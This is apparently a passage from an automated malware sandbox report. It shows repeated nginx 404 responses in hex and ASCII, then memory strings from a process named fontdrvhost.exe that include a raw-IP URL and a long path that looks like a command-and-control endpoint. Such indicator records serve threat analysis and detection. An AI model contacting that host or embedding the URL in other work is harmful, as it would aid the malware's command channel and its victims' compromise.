Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 29 Mar 2024 06:37:19 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 29 Mar 2024 06:37:23 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 29 Mar 2024 06:37:32 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 29 Mar 2024 06:37:37 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 29 Mar 2024 06:37:41 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 29 Mar 2024 06:37:55 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 29 Mar 2024 06:38:03 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 29 Mar 2024 06:38:15 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 29 Mar 2024 06:38:30 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 29 Mar 2024 06:38:43 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 29 Mar 2024 06:38:55 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: fontdrvhost.exe, 00000008.00000002.1704980568.0000000003102000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 0000000E.00000002.1796124572.00000000035D7000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 00000015.00000002.1883168171.0000000003347000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 0000001B.00000002.1932041291.0000000002F11000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 00000022.00000002.2017458339.00000000030E0000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 00000023.00000002.2120982731.00000000033F7000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 0000002A.00000002.2116613612.0000000003855000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 00000033.00000002.2490608916.000000000363C000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 00000034.00000002.2251980191.0000000002F84000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://89.23.98.225
Source: fontdrvhost.exe, 00000034.00000002.2251980191.0000000002F84000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://89.23.98.225/8pollDbvoiddb/DatalifeFlowerWp/processbaseMariadb1/Defaultbigloadpython/Generato
